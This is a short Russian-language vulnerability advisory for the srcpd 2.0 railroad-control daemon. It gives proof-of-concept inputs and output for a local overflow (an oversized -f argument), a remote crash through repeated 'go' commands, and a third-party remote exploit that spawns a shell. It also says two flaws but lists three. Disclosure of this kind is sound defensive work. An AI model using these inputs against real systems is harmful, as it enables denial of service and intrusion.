Множественные уязвимости в Srcpd демоне

Srcpd (Simple Railroad Command Protocol) – демон, позволяющий вам управлять и играть в железную дорогу, используя любой SRCP Client. В программе обнаружено 2 уязвимости:

1. Локальное переполнение буфера Переполнение буфера обнаружено в параметре 'conffile' в srcpd.c файле. Локальный пользователь может выполнить произвольный код с поднятыми привилегиями. Пример:

   [over@localhost m00]$ /usr/sbin/srcpd -f `perl -e 'print "A" x 10000'`
   Program received signal SIGSEGV, Segmentation fault.
   [Switching to Thread 1024 (LWP 1197)]
   0x420d2a44 in _getopt_internal () from /lib/i686/libc.so.6
   

2. Удаленное целочисленное переполнение буфера. Пример:

   [over@localhost m00]$ telnet localhost 12340
   Trying 127.0.0.1...
   Connected to localhost.
   Escape character is '^]'.
   srcpd V2; SRCP 0.8.2
   go 11111111
   1060333759.411 200 OK GO 1
   go 11111111
   Connection closed by foreign host.
   
   [over@localhost m00]$ telnet localhost 12340
   Trying 127.0.0.1...
   telnet: connect to address 127.0.0.1: Connection refused
   

3. Удаленное переполнение стека/выполнение произвольного кода: Несколько переполнений стека обнаружено в обработчике метода. Например, в handleSET() и handleGET() и др. Уязвимость может использоваться для выполнения произвольного кода. Пример:

   [h0snp@h0m3 srcpd]$ ./m00-srcpd -h localhost -t 0
    ** ***************************************** **
    ** Srcpd v2.0 remote exploit by m00 Security **
    ** ***************************************** **
    Conneting...OK
    using RET = 0xbf1fcb61
    now, if you was lucky with ret, shell spawned on 26112.
   [h0snp@h0m3 srcpd]$ telnet localhost 26112
   Trying 127.0.0.1...
   Connected to localhost.
   Escape character is '^]'.
   id;
   uid=500(h0snp) gid=500(h0snp) groups=500(h0snp)
   

Уязвимость обнаружена в srcpd 2.0